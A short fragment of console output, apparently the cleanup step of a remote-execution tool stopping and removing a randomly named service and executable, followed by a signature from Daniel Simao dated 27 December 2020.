[*] Stopping service XuLc.....
[*] Removing service XuLc.....
[*] Removing file BKaLscZa.exe.....

Daniel Simao 08:43, 27 December 2020 (EST)